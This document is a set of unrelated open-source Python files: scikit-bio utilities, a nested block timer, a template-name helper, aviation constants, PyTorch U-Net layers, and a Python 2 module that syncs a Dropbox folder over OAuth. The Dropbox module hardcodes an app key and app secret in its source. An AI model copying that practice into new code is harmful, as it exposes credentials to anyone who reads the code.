return obj.metadata[key]
raise TypeError("Could not resolve key %r. Key must be callable or %s must"
" have `metadata` attribute." % (key,
obj.__class__.__name__))
def make_sentinel(name):
return type(name, (object, ), {
'__repr__': lambda s: name,
'__str__': lambda s: name,
'__class__': None
})()
def find_sentinels(function, sentinel):
keys = []
if hasattr(inspect, 'signature'):
params = inspect.signature(function).parameters
for name, param in params.items():
if param.default is sentinel:
keys.append(name)
else: # Py2
function_spec = inspect.getargspec(function)
if function_spec.defaults is not None:
# Concept from http://stackoverflow.com/a/12627202/579416
keywords_start = -len(function_spec.defaults)
for key, default in zip(function_spec.args[keywords_start:],
function_spec.defaults):
if default is sentinel:
keys.append(key)
return keys
class MiniRegistry(dict):
def __call__(self, name):
"""Act as a decorator to register functions with self"""
def decorator(func):
self[name] = func
return func
return decorator
def copy(self):
"""Useful for inheritance"""
return self.__class__(super(MiniRegistry, self).copy())
def formatted_listing(self):
"""Produce an RST list with descriptions."""
if len(self) == 0:
return "\tNone"
else:
return "\n".join(["\t%r\n\t %s" %
(name, self[name].__doc__.split("\n")[0])
for name in sorted(self)])
def interpolate(self, obj, name):
"""Inject the formatted listing in the second blank line of `name`."""
# Py2/3 compatible way of calling getattr(obj, name).__func__
f = getattr(obj, name).__get__(None, type(None))
if hasattr(f, 'func_code'):
f2 = FunctionType(f.func_code, f.func_globals, name=f.func_name,
argdefs=f.func_defaults, closure=f.func_closure)
else:
f2 = FunctionType(f.__code__, f.__globals__, name=f.__name__,
argdefs=f.__defaults__, closure=f.__closure__)
# Conveniently the original docstring is on f2, not the new ones if
# inheritance is happening. I have no idea why.
t = f2.__doc__.split("\n\n")
t.insert(2, self.formatted_listing())
f2.__doc__ = "\n\n".join(t)
setattr(obj, name, f2)
def chunk_str(s, n, char):
"""Insert `char` character every `n` characters in string `s`.
Canonically pronounced "chunkster".
"""
# Modified from http://stackoverflow.com/a/312464/3776794
if n < 1:
raise ValueError(
"Cannot split string into chunks with n=%d. n must be >= 1." % n)
return char.join((s[i:i+n] for i in range(0, len(s), n)))
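# e.g. chunk_str("ABCDEFG", 3, "-") -> "ABC-DEF-G"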
@experimental(as_of="0.4.0")
def cardinal_to_ordinal(n):
"""Return ordinal string version of cardinal int `n`.
Parameters
----------
n : int
Cardinal to convert to ordinal. Must be >= 0.
Returns
-------
str
Ordinal version of cardinal `n`.
Raises
------
ValueError
If `n` is less than 0.
Notes
-----
This function can be useful when writing human-readable error messages.
Examples
--------
>>> from skbio.util import cardinal_to_ordinal
>>> cardinal_to_ordinal(0)
'0th'
>>> cardinal_to_ordinal(1)
'1st'
>>> cardinal_to_ordinal(2)
'2nd'
>>> cardinal_to_ordinal(3)
'3rd'
"""
# Taken and modified from http://stackoverflow.com/a/20007730/3776794
# Originally from http://codegolf.stackexchange.com/a/4712 by Gareth
if n < 0:
raise ValueError("Cannot convert negative integer %d to ordinal "
"string." % n)
return "%d%s" % (n, "tsnrhtdd"[(n//10 % 10 != 1)*(n % 10 < 4)*n % 10::4])
@experimental(as_of="0.4.0")
def is_casava_v180_or_later(header_line):
"""Check if the header looks like it is Illumina software post-casava v1.8
Parameters
----------
header_line : bytes
A header line
Returns
-------
bool
``True`` for if casava v1.8+, otherwise ``False``
Examples
--------
>>> from skbio.util import is_casava_v180_or_later
>>> is_casava_v180_or_later(b'@foo')
False
>>> id_ = b'@M00176:17:000000000-A0CNA:1:1:15487:1773 1:N:0:0'
>>> is_casava_v180_or_later(id_)
True
"""
if not header_line.startswith(b'@'):
raise ValueError("Non-header line passed in.")
fields = header_line.split(b':')
return len(fields) == 10 and fields[7] in b'YN'
@experimental(as_of="0.4.0")
def safe_md5(open_file, block_size=2 ** 20):
"""Computes an md5 sum without loading the file into memory
Parameters
----------
open_file : file object
open file handle to the archive to compute the checksum. It
must be open as a binary file
block_size : int, optional
size of the block taken per iteration
Returns
-------
md5 : md5 object from the hashlib module
object with the loaded file
Notes
-----
This method is based on the answers given in:
http://stackoverflow.com/a/1131255/379593
Examples
--------
>>> from io import BytesIO
>>> from skbio.util import safe_md5
>>> fd = BytesIO(b"foo bar baz") # open file like object
>>> x = safe_md5(fd)
>>> x.hexdigest()
'ab07acbb1e496801937adfa772424bf7'
>>> fd.close()
"""
md5 = hashlib.md5()
data = True
while data:
data = open_file.read(block_size)
if data:
md5.update(data)
return md5
@experimental(as_of="0.4.0")
def remove_files(list_of_filepaths, error_on_missing=True):
"""Remove list of filepaths, optionally raising an error if any are missing
Parameters
----------
list_of_filepaths : list of strings
list with filepaths to remove
error_on_missing : bool, optional
whether or not the function should raise an ``OSError`` if a file is
not found
Raises
------
OSError
If a filepath in the list does not exist
Examples
--------
>>> from tempfile import NamedTemporaryFile
>>> from os.path import exists
>>> from skbio.util import remove_files
>>> h = NamedTemporaryFile(delete=False)
>>> exists(h.name) # it exists
True
>>> remove_files([h.name])
>>> exists(h.name) # and now it's gone
False
"""
missing = []
for fp in list_of_filepaths:
try:
remove(fp)
except OSError:
missing.append(fp)
if error_on_missing and missing:
raise OSError("Some filepaths were not accessible: %s" %
'\t'.join(missing))
@experimental(as_of="0.4.0")
def create_dir(dir_name, fail_on_exist=False, handle_errors_externally=False):
"""Create a directory safely and fail meaningfully
Parameters
----------
dir_name: string
name of directory to create
fail_on_exist: bool, optional
if true raise an error if ``dir_name`` already exists
handle_errors_externally: bool, optional
if True do not raise Errors, but return failure codes. This allows to
handle errors locally and e.g. hint the user at a --force_overwrite
options.
Returns
-------
return_value : int
These values are only returned if no error is raised:
- ``0``: directory was safely created
- ``1``: directory already existed
- ``2``: a file with the same name exists
- ``3``: any other unspecified ``OSError``
Notes
-----
Depending of how thorough we want to be we could add tests, e.g. for
testing actual write permission in an existing dir.
Examples
--------
>>> from skbio.util import create_dir
>>> from os.path import exists, join
>>> from tempfile import gettempdir
>>> from os import rmdir
>>> new_dir = join(gettempdir(), 'scikitbio')
>>> create_dir(new_dir)
0
>>> exists(new_dir)
True
>>> rmdir(new_dir)
"""
error_code_lookup = _get_create_dir_error_codes()
# pre-instantiate the error handler with dir_name and the error-handling mode
ror = partial(_handle_error_codes, dir_name, handle_errors_externally)
if exists(dir_name):
if isdir(dir_name):
# dir is there
if fail_on_exist:
return ror(error_code_lookup['DIR_EXISTS'])
else:
return error_code_lookup['DIR_EXISTS']
else:
# must be file with same name
return ror(error_code_lookup['FILE_EXISTS'])
else:
# no dir there, try making it
try:
makedirs(dir_name)
except OSError:
return ror(error_code_lookup['OTHER_OS_ERROR'])
return error_code_lookup['NO_ERROR']
@experimental(as_of="0.4.0")
def find_duplicates(iterable):
"""Find duplicate elements in an iterable.
Parameters
----------
iterable : iterable
Iterable to be searched for duplicates (i.e., elements that are
repeated).
Returns
-------
set
Repeated elements in `iterable`.
"""
# modified from qiita.qiita_db.util.find_repeated
# https://github.com/biocore/qiita
# see licenses/qiita.txt
seen, repeated = set(), set()
for e in iterable:
if e in seen:
repeated.add(e)
else:
seen.add(e)
return repeated
def _get_create_dir_error_codes():
return {'NO_ERROR': 0,
'DIR_EXISTS': 1,
'FILE_EXISTS': 2,
'OTHER_OS_ERROR': 3}
def _handle_error_codes(dir_name, suppress_errors=False,
error_code=None):
"""Wrapper function for error_handling.
dir_name: name of directory that raised the error
suppress_errors: if True raise Errors, otherwise return error_code
error_code: the code for the error
"""
error_code_lookup = _get_create_dir_error_codes()
if error_code is None:
error_code = error_code_lookup['NO_ERROR']
error_strings = \
{error_code_lookup['DIR_EXISTS']:
"Directory already exists: %s" % dir_name,
error_code_lookup['FILE_EXISTS']:
"File with same name exists: %s" % dir_name,
error_code_lookup['OTHER_OS_ERROR']:
"Could not create output directory: %s. " % dir_name +
"Check the permissions."}
if error_code == error_code_lookup['NO_ERROR']:
return error_code_lookup['NO_ERROR']
if suppress_errors:
return error_code
else:
raise OSError(error_strings[error_code])
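# --- Illustrative usage (added; not part of the original module) ---
# A minimal sketch exercising the helpers above. `find_duplicates` returns a
# set, so the elements are sorted here to make the output deterministic.
if __name__ == "__main__":
    from io import BytesIO
    print(safe_md5(BytesIO(b"foo bar baz")).hexdigest())  # ab07acbb1e496801937adfa772424bf7
    print(sorted(find_duplicates(["a", "b", "a", "c", "b"])))  # ['a', 'b']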
|
# Copyright 2014 Julia Eskew
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
from timeit import default_timer
from code_block_timer.storage import TimingDataStorage
class Globals(threading.local):
    def __init__(self):
        # threading.local re-runs __init__ in each thread that touches the
        # instance, so these are per-thread values (a mutable class-level
        # list here would be shared across threads).
        # Current module-level nest stack.
        # As CodeBlockTimer objects are __enter__ed, their descriptions are pushed
        # onto this stack. The stack length indicates the current nesting level.
        self.nest_stack = []
        # Current run_id.
        # Set from data storage when the stack size increases from 0.
        # While the nest stack is populated, remains at a constant value.
        # Identifies all the timings from the same run.
        self.run_id = None
_m = Globals()
class CodeBlockTimer(object):
def __init__(self, block_desc, **kwargs):
self.block_desc = block_desc
        # pop so 'verbose' is not forwarded to TimingDataStorage below
        self.verbose = kwargs.pop('verbose', False)
self.timer = default_timer
self.delimiter = kwargs.pop('delimiter', ':')
self.data_store = TimingDataStorage(**kwargs)
def __enter__(self):
if len(_m.nest_stack) == 0:
_m.run_id = self.data_store.run_id()
_m.nest_stack.append(self.block_desc)
self.start = self.timer()
return self
def __exit__(self, *args):
# Compute elapsed times.
end = self.timer()
self.elapsed_secs = end - self.start
self.elapsed = self.elapsed_secs * 1000 # millisecs
# Store the timings.
nested_desc = self.delimiter.join(_m.nest_stack)
self.data_store.store(_m.run_id, nested_desc, self.elapsed)
# Pop the stack.
_m.nest_stack.pop()
if len(_m.nest_stack) == 0:
_m.run_id = None
if self.verbose:
print '{}: elapsed time: {} ms'.format(
self.block_desc, self.elapsed
)
def __call__(self, func):
def wrapper(*args, **kwargs):
with self:
return func(*args, **kwargs)
return wrapper
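# Illustrative usage (added; not part of the original module). The storage
# arguments accepted by TimingDataStorage are assumed, so this is left as a
# comment sketch rather than executable code:
#
#     with CodeBlockTimer("outer", verbose=True):
#         with CodeBlockTimer("inner", verbose=True):
#             do_work()   # timings recorded as "outer" and "outer:inner"
#
# The decorator form wraps a function body in the same way:
#
#     @CodeBlockTimer("my_func")
#     def my_func():
#         ...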
|
from typing import Optional, Tuple
DEFAULT_NAMESPACE = "vernacular-ai"
DEFAULT_PROJECT_TEMPLATE = "dialogy-template-simple-transformers"
def canonicalize_project_name(
template: Optional[str] = None, namespace: Optional[str] = None
) -> Tuple[str, str]:
"""
    :param template: Scaffolding will be generated using a copier template project. This is the link to the project, defaults to "dialogy-template-simple-transformers".
    :type template: str, optional
    :param namespace: The user or the organization that supports the template, defaults to "vernacular-ai".
    :type namespace: str, optional
    :return: The resolved (template, namespace) pair, with defaults applied.
    :rtype: Tuple[str, str]
"""
template = template or DEFAULT_PROJECT_TEMPLATE
namespace = namespace or DEFAULT_NAMESPACE
return template, namespace
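# Quick self-check (added for illustration): the defaults are applied when the
# arguments are omitted or falsy.
if __name__ == "__main__":
    assert canonicalize_project_name() == (DEFAULT_PROJECT_TEMPLATE, DEFAULT_NAMESPACE)
    assert canonicalize_project_name(namespace="my-org") == (DEFAULT_PROJECT_TEMPLATE, "my-org")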
|
'''
Copyright 2022 Airbus SAS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import numpy as np
gravity = 9.80665 # Earth-surface gravitational acceleration (m/s**2)
rad_to_deg = 180. / np.pi
deg_to_rad = np.pi / 180.
ft2m = 0.3048 # feet to meter
mtft = 3.2808399 # meter to feet
kt2m_s = 0.5144444
Nm2m = 1852
###
# "Awesome" breaking model
mu_r = 0.02 # Rolling friction coefficient
mu_b = 0.6 # Breaking friction coefficient
nr_solver_conf = {
    'eps': 10 ** -5,
    'stop_residual': 10 ** -7,
    'max_ite': 20,
    'relax_factor': 0.95,
}
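# Illustrative use of the conversion constants above (added; the values are
# arbitrary examples): a 150 kt approach speed and a 10,000 ft altitude.
if __name__ == "__main__":
    print(150 * kt2m_s)     # ~77.17 m/s
    print(10000 * ft2m)     # 3048.0 m
    print(90 * deg_to_rad)  # ~1.5708 rad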
|
'''
Created on May 21, 2018
@author: helrewaidy
'''
# sub-parts of the U-Net model
import torch
import torch.nn as nn
import torch.nn.functional as F
class double_conv(nn.Module):
    '''(conv => BN => ReLU) * 2'''
def __init__(self, in_ch, out_ch):
super(double_conv, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(in_ch, out_ch, 3, padding=1),
nn.BatchNorm2d(out_ch, affine=True), #, affine=False
nn.ReLU(inplace=True),
nn.Conv2d(out_ch, out_ch, 3, padding=1),
nn.BatchNorm2d(out_ch, affine=True), #, affine=False
nn.ReLU(inplace=True)
)
def forward(self, x):
x = self.conv(x)
return x
class down_conv(nn.Module):
def __init__(self, in_ch):
super(down_conv, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(in_ch, in_ch, [3,3],stride=(2,2), padding=1),
nn.BatchNorm2d(in_ch, affine=True),
nn.ReLU(inplace=True),
)
def forward(self, x):
x = self.conv(x)
return x
class inconv(nn.Module):
def __init__(self, in_ch, out_ch):
super(inconv, self).__init__()
self.conv = double_conv(in_ch, out_ch)
def forward(self, x):
x = self.conv(x)
return x
class down(nn.Module):
def __init__(self, in_ch, out_ch):
super(down, self).__init__()
self.down_conv = down_conv(in_ch)
self.double_conv = double_conv(in_ch, out_ch)
def forward(self, x):
down_x = self.down_conv(x)
x = self.double_conv(down_x)
return x, down_x
class bottleneck(nn.Module):
def __init__(self, in_ch, out_ch, residual_connection=True):
super(bottleneck, self).__init__()
self.residual_connection = residual_connection
self.down_conv = down_conv(in_ch)
self.double_conv = nn.Sequential(
nn.Conv2d(in_ch, 2*in_ch, 3, padding=1),
nn.BatchNorm2d(2*in_ch, affine=True),
nn.ReLU(inplace=True),
nn.Conv2d(2*in_ch, out_ch, 3, padding=1),
nn.BatchNorm2d(out_ch, affine=True),
nn.ReLU(inplace=True)
)
def forward(self, x):
down_x = self.down_conv(x)
if self.residual_connection:
x = self.double_conv(down_x) + down_x
else:
x = self.double_conv(down_x)
return x
class up(nn.Module):
def __init__(self, in_ch, out_ch, bilinear=True):
super(up, self).__init__()
        # NOTE: `bilinear` is accepted for API compatibility but is currently
        # unused; upsampling is always bilinear.
        self.up = nn.UpsamplingBilinear2d(scale_factor=2)
self.conv = nn.Sequential(
nn.Conv2d(in_ch * 2, in_ch, 3, padding=1),
nn.BatchNorm2d(in_ch, affine=True), #, affine=False
nn.ReLU(inplace=True),
nn.Conv2d(in_ch , out_ch, 3, padding=1),
nn.BatchNorm2d(out_ch, affine=True),
nn.ReLU(inplace=True)
)
def forward(self, x1, x2):
x1 = self.up(x1)
        # Pad the skip connection x2 to match the upsampled x1. F.pad pads the
        # last dimension first, so the width diff (dim 3) must come before the
        # height diff (dim 2); the second half takes the rounding remainder.
        diffH = x1.size()[2] - x2.size()[2]
        diffW = x1.size()[3] - x2.size()[3]
        x2 = F.pad(x2, (diffW // 2, diffW - diffW // 2,
                        diffH // 2, diffH - diffH // 2))
x = torch.cat([x2, x1], dim=1)
x = self.conv(x)
return x
class mag_phase_combine(nn.Module):
def __init__(self, in_ch, out_ch):
super(mag_phase_combine, self).__init__()
self.conv1d = nn.Sequential(
nn.Conv2d(in_ch, out_ch, [1, 1], padding=(0,0))
)
def forward(self, x):
        # split into the magnitude and phase halves along dim 2
        x1, x2 = torch.split(x, x.size()[2] // 2, dim=2)
x = torch.cat([x1, x2], dim=1)
x = self.conv1d(x)
return x
class outconv(nn.Module):
def __init__(self, in_ch, out_ch):
super(outconv, self).__init__()
self.conv = nn.Conv2d(in_ch, out_ch, [1, 1])
def forward(self, x):
x = self.conv(x)
return x
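# Minimal shape check (added for illustration; the channel sizes are assumed,
# not taken from the original training code): route a random tensor through
# inconv -> down -> up and confirm the skip connection aligns.
if __name__ == "__main__":
    x = torch.randn(1, 1, 64, 64)
    stem = inconv(1, 16)   # 1 -> 16 channels at full resolution
    enc = down(16, 16)     # halves the resolution, keeps 16 channels
    dec = up(16, 8)        # expects x1 and x2 with 16 channels each
    f0 = stem(x)           # (1, 16, 64, 64)
    f1, _ = enc(f0)        # (1, 16, 32, 32)
    out = dec(f1, f0)      # (1, 8, 64, 64)
    print(out.shape)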
|
import os, json, shutil, glob, calendar, codecs, fnmatch, re, unicodedata, errno
from abc import ABCMeta, abstractmethod
from datetime import datetime
from threading import Thread, Event as TEvent
from collections import Iterable
from stat import *
from inspect import isclass, getmembers
from sys import modules
# Include the Dropbox SDK libraries
import dropbox
from dropbox import Dropbox, DropboxOAuth2FlowNoRedirect, files
from witica.util import Event, KillableThread, sstr, suni, throw, get_cache_folder
from witica import *
from witica.log import *
from witica.metadata import extractor
cache_folder = get_cache_folder("Source")
class Source(Loggable):
"""Abstract source class representing any storage containing items"""
__metaclass__ = ABCMeta
def __init__(self, source_id, config, prefix = ""):
self.source_id = source_id
self.prefix = prefix
self.items = SourceItemList(self)
self.log_id = source_id
self.changeEvent = Event()
self.cursorEvent = Event()
self.stoppedEvent = Event()
self.continuous = True
self._stop = TEvent()
self.worker_thread = Thread(target=self.work, name=self.source_id)
if config["version"] != 1:
raise IOError("Version of source config file is not compatible. Must be 1 but is " + str(config["version"]) + ".")
def start_update(self, continuous=True):
self.continuous = continuous
self.worker_thread.start()
def work(self):
self.log("Sourcing thread started.", Logtype.DEBUG)
		if not self.continuous:  # fetch changes only once
			try:
				cursor = self.fetch_changes(self.changeEvent, self.state["cursor"])
				if cursor is not None:
					self.state["cursor"] = cursor
					self.cursorEvent(self, self.state["cursor"])
					self.write_state()
			except Exception, e:
				self.log_exception("Fetching changes failed.", Logtype.ERROR)
		else: #fetch changes continuously
while not self._stop.is_set():
self.update_change_status()
if self._stop.is_set(): break
if self.changes_available:
try:
cursor = self.fetch_changes(self.changeEvent, self.state["cursor"])
if cursor:
self.state["cursor"] = cursor
self.cursorEvent(self,self.state["cursor"])
self.write_state()
except Exception, e:
self.log_exception("Fetching changes failed.", Logtype.ERROR)
self.stoppedEvent(self,None)
self.log("Worker thread stopped.", Logtype.DEBUG)
def stop(self):
self._stop.set()
def get_item_id(self,path):
return path.split(".")[0].split("@")[0] #id is the path until first @ or .
def item_exists(self,item_id):
return SourceItem(self,item_id).exists
def resolve_reference(self, reference, item, allow_patterns = False):
reference = reference.lower()
if re.match(extractor.RE_ITEM_REFERENCE, reference):
itempattern = SourceItemList.absolute_itemid(reference[1:], item)
if allow_patterns:
matching_items = self.items.get_items(itempattern)
if len(matching_items) > 0:
matching_item_ids = [item.item_id for item in matching_items]
if len(matching_item_ids) == 1:
return matching_item_ids[0]
else:
return matching_item_ids
else:
return itempattern
else:
return itempattern
else:
raise ValueError("'" + reference + "' is not a valid reference")
def get_local_path(self, absolutepath):
if absolutepath.startswith(self.get_absolute_path("")):
i = len(self.get_absolute_path(""))
return absolutepath[i+1:]
else:
raise ValueError("'" + absolutepath + "'' is no valid absolute path inside the source '" + self.source_id + "'.")
@staticmethod
def construct_from_json (source_id, config, prefix = ""):
classes = Source.get_classes()
instance = classes[config["type"]](source_id, config, prefix)
return instance
@staticmethod
def construct_from_file(filename):
#load source file
try:
source_id = os.path.split(filename)[1].rsplit(".")[0]
config = json.loads(codecs.open(filename, "r", "utf-8").read())
return Source.construct_from_json(source_id, config)
except Exception as e:
throw(IOError, "Loading source config file '" + sstr(filename) + "' failed", e)
@staticmethod
def construct_from_working_dir():
source_dir = os.getcwd()
if source_dir.find(os.sep + "Dropbox" + os.sep) > -1:
prefix = ""
while not(Source.is_source_dir(source_dir)) and source_dir.find(os.sep) > -1:
prefix = prefix + source_dir.rpartition(os.sep)[2] + "/"
source_dir = source_dir.rpartition(os.sep)[0]
if Source.is_source_dir(source_dir):
folder = source_dir.partition(os.sep + "Dropbox")[2]
config = {}
config["version"] = 1
config["type"] = "DropboxFolder"
config["app_key"] = "fgpviq15t751f6n"
config["app_secret"] = "e4auyq6wzrz04p6"
config["folder"] = folder.decode("utf-8")
return Source.construct_from_json(folder.replace(os.sep, "__").decode("utf-8").encode("ascii", "ignore"), config, prefix = prefix)
else:
raise IOError("Working directory is not a valid source. Must contain /meta directory.")
else:
raise IOError("Working directory is not a valid source. Must be a folder inside your Dropbox.")
@staticmethod
def is_source_dir(source_dir):
if source_dir.find(os.sep + "Dropbox" + os.sep) > -1 \
and os.path.exists(source_dir + os.sep + "meta") \
and os.path.isdir(source_dir + os.sep + "meta"):
return True
else:
return False
@staticmethod
def get_classes():
classes = {}
for name, obj in getmembers(modules[__name__]):
if isclass(obj):
classes[name] = obj
return classes
@abstractmethod
def update_cache(self):
pass
@abstractmethod
def update_change_status(self):
pass
@abstractmethod
def fetch_changes(self):
pass
@abstractmethod
def get_abs_meta_filename(self, local_filename):
pass
@abstractmethod
def get_absolute_path(self, local_path):
pass
class DropboxSource(Source):
doc = "Dropbox folder containing a witica source"
__metaclass__ = ABCMeta
def __init__(self, source_id, config, prefix = ""):
super(DropboxSource, self).__init__(source_id, config, prefix)
self.source_dir = cache_folder + os.sep + self.source_id
self.state_filename = cache_folder + os.sep + self.source_id + ".source"
self.app_key = config["app_key"]
self.app_secret = config["app_secret"]
def start_session(self):
self.state = {}
self.load_state()
try:
self.dbx = Dropbox(self.state["access_token"])
except Exception, e:
try:
self.link()
self.dbx = Dropbox(self.state["access_token"])
except Exception, e1:
throw(IOError, "Could not get access to Dropbox. OAuth failed.", e1)
self.log("Initialized source.", Logtype.DEBUG)
def load_state(self):
if os.path.isfile(self.state_filename):
self.state = json.loads(codecs.open(self.state_filename, "r", "utf-8").read())
if self.state["version"] == 1:
#migrate from state version 1
#upgrade to drobpox api v2 / remove old token data from state
self.log("Upgrading to Dropbox API v2. You will be asked to grant access again.", Logtype.WARNING)
self.state.pop("token_key", None)
self.state.pop("token_secret", None)
self.state["version"] = 2
if self.state["version"] != 2:
raise IOError("Version of source state file is not compatible. Should be 2 but is " + str(self.state["version"]) + ".")
if "cache_cursor" in self.state:
self.cache_cursor = self.state["cache_cursor"]
else:
self.cache_cursor = ""
else:
self.state["version"] = 2
self.state["cursor"] = ""
self.state["cache_cursor"] = ""
self.cache_cursor = ""
def write_state(self):
self.state["cache_cursor"] = self.cache_cursor
if not(os.path.isdir(self.source_dir)):
os.makedirs(self.source_dir)
s = json.dumps(self.state, indent=3, encoding="utf-8") + "\n"
f = codecs.open(self.state_filename, "w", encoding="utf-8")
f.write(s)
f.close()
self.load_state()
def link(self):
auth_flow = DropboxOAuth2FlowNoRedirect(self.app_key, self.app_secret)
url = auth_flow.start()
Logger.get_printlock().acquire()
try:
print "url:", url
print "Please authorize in the browser. After you're done, copy and paste the authorization code and press enter."
auth_code = raw_input("Enter the authorization code here: ").strip()
except Exception as e:
raise e
finally:
Logger.get_printlock().release()
try:
oauth_result = auth_flow.finish(auth_code)
except Exception, e:
self.log_exception("Dropbox authorization failed.", Logtype.ERROR)
raise e
self.state["access_token"] = oauth_result.access_token
self.write_state()
def update_cache(self):
if os.path.isdir(self.source_dir):
try:
delta = self.dbx.files_list_folder_continue(self.cache_cursor)
except Exception as e:
self.log_exception("Could not use delta. Trying to rebuild the cache.", Logtype.WARNING)
shutil.rmtree(self.source_dir)
os.makedirs(self.source_dir)
delta = self.dbx.files_list_folder(path = self.path_prefix if not self.path_prefix == "" else None, recursive=True)
else:
os.makedirs(self.source_dir)
delta = self.dbx.files_list_folder(path = self.path_prefix if not self.path_prefix == "" else None, recursive=True)
if self._stop.is_set(): return
#update cache
filecount = 0
for metadata in delta.entries:
path = unicodedata.normalize("NFC",unicode(metadata.path_lower))
if path.startswith(self.path_prefix):
path = path[len(self.path_prefix):]
if isinstance(metadata, files.DeletedMetadata): #deleted file or directory
if os.path.exists(self.source_dir + path):
if os.path.isdir(self.source_dir + path):
try:
shutil.rmtree(self.source_dir + path)
except Exception, e:
if not(e.errno == errno.ENOENT): #don't treat as error, if file didn't exist
self.log_exception("Directory '" + self.source_dir + path + "' in source cache could not be removed.", Logtype.WARNING)
else:
try:
os.remove(self.source_dir + path)
except Exception, e:
if not(e.errno == errno.ENOENT): #don't treat as error, if file didn't exist
self.log_exception("File '" + self.source_dir + path + "' in source cache could not be removed.", Logtype.WARNING)
elif isinstance(metadata, files.FolderMetadata): #directory
if not(os.path.exists(self.source_dir + path)):
try:
os.makedirs(self.source_dir + path)
except Exception, e:
self.log_exception("Directory '" + self.source_dir + path + "' in source cache could not be created.", Logtype.ERROR)
elif isinstance(metadata, files.FileMetadata): #new/changed file
self.log("Downloading '" + path + "'...", Logtype.DEBUG)
try:
#download file
self.dbx.files_download_to_file(self.source_dir + path, self.path_prefix + path)
#set modified time
try:
mtime = calendar.timegm(metadata.server_modified.timetuple())
st = os.stat(self.source_dir + path)
atime = st[ST_ATIME]
os.utime(self.source_dir + path,(atime,mtime))
except Exception, e:
self.log_exception("The original modification date of file '" + sstr(path) + "' couldn't be extracted. Using current time instead.", Logtype.WARNING)
filecount += 1
except Exception, e:
self.log_exception("Downloading '" + sstr(self.path_prefix + path) + "' failed (skipping file).", Logtype.ERROR)
if self._stop.is_set(): return
self.cache_cursor = delta.cursor
self.write_state()
if delta.has_more:
self.update_cache()
self.log("Cache updated. Updated files: " + sstr(filecount), Logtype.DEBUG)
def update_change_status(self):
self.changes_available = False
t = KillableThread(target=self.update_change_status_blocking, name=self.source_id + " Dropbox (longpoll)")
t.start()
while t.isAlive():
if self._stop.is_set():
try:
t.kill()
except Exception, e:
self.log_exception(e)
pass
t.join(1)
def update_change_status_blocking(self):
if self.state["cursor"]:
try:
delta = self.dbx.files_list_folder_longpoll(self.state["cursor"],30)
self.changes_available = delta.changes
except Exception, e:
self.changes_available = False
else:
self.changes_available = True
def fetch_changes(self,change_event, cursor=None):
global cache_folder
self.update_cache()
if self._stop.is_set(): return
self.log("Fetching changes...", Logtype.DEBUG)
if cursor == "":
cursor = None
if cursor != None:
delta = self.dbx.files_list_folder_continue(cursor)
else:
delta = self.dbx.files_list_folder(path = self.path_prefix if not self.path_prefix == "" else None, recursive=True)
#fire change events
for metadata in delta.entries:
path = unicodedata.normalize("NFC", unicode(metadata.path_lower))
if path.startswith(self.path_prefix):
path = path[len(self.path_prefix):]
if path.startswith("/"):
path = path[1:]
if isinstance(metadata, files.FileMetadata) or isinstance(metadata, files.DeletedMetadata):
if re.match(extractor.RE_METAFILE, path): #site metadata change
self.log("Metafile changed: " + sstr(path), Logtype.INFO)
change_event(self,MetaChanged(self,path.partition("meta/")[2]))
elif re.match(extractor.RE_ITEMFILE, path):
item = SourceItem(self, self.get_item_id(path))
if item.exists:
self.log("Item changed: " + sstr(path), Logtype.INFO)
change_event(self,ItemChanged(self, self.get_item_id(path), path))
else:
self.log("Item removed: " + sstr(path), Logtype.INFO)
change_event(self,ItemRemoved(self, self.get_item_id(path)))
elif isinstance(metadata, files.FileMetadata):
self.log("File '" + path + "' is not supported and will be ignored. Filenames containing '@' are currently not supported.", Logtype.WARNING)
if self._stop.is_set(): return
cursor = delta.cursor
if delta.has_more:
cursor = self.fetch_changes(change_event, delta.cursor)
return cursor
def get_abs_meta_filename(self, local_filename):
return self.get_absolute_path(os.path.join('meta' + os.sep + local_filename))
def get_absolute_path(self, localpath):
return os.path.abspath(os.path.join(self.source_dir, localpath))
class DropboxAppFolder(DropboxSource): #TODO: remove (legacy)
def __init__(self, source_id, config, prefix = ""):
super(DropboxAppFolder, self).__init__(source_id, config, prefix)
self.path_prefix = ""
self.start_session()
class DropboxFolder(DropboxSource):
def __init__(self,source_id,config, prefix = ""):
super(DropboxFolder, self).__init__(source_id, config, prefix)
self.path_prefix = unicodedata.normalize("NFC",config["folder"].lower())
self.start_session()
class SourceItemList(object):
"""An iteratable that allows to access all items in a source"""
def __init__(self, source):
self.source = source
def __getitem__(self,key):
if isinstance(key, basestring):
if self.source.item_exists(key):
return SourceItem(self.source, key)
else:
raise(KeyError("An item with id '" + key + "' does not exist in source '" + self.source.source_id + "'."))
else:
raise(TypeError("The type '" + key.__class__.__name__ + "'' is not supported. Use 'str' instead to access items."))
def __len__(self):
count = 0
for item in self:
count += 1
return count
def __iter__(self):
for root, dirs, files in os.walk(self.source.get_absolute_path(""), topdown=True):
last_item_id = ""
for filename in files:
local_path = self.source.get_local_path(os.path.join(root,filename))
item_id = re.match(extractor.RE_ITEM_SPLIT_ITEMID_EXTENSION, local_path)
if item_id:
item_id = item_id.group(1)
if self.source.item_exists(item_id) and item_id != last_item_id: #only yield valid items and only once
yield SourceItem(self.source, item_id)
last_item_id = item_id
@staticmethod
def match(pattern, itemid):
"""checks if an itemid matches a specific itemid pattern (that can contain *, ** or ? as placeholders"""
tokenized = re.split(r"(\*\*|\*|\?)", pattern)
regex = ""
for token in tokenized:
if token == "**": #matches all character sequences
regex += "[\s\S]*"
elif token == "*": #matches all character sequences that don't contain /
regex += "[^\/]*"
elif token == "?": #matches any single character
regex += "[\s\S]"
else: #escape the remaining strings
regex += re.escape(token)
if re.match("^" + regex + "$", itemid):
return True
else:
return False
@staticmethod
def absolute_itemid(relative_itemid, current_item):
relative_itemid = relative_itemid.lower()
if relative_itemid.startswith("./"): #expand relative item id
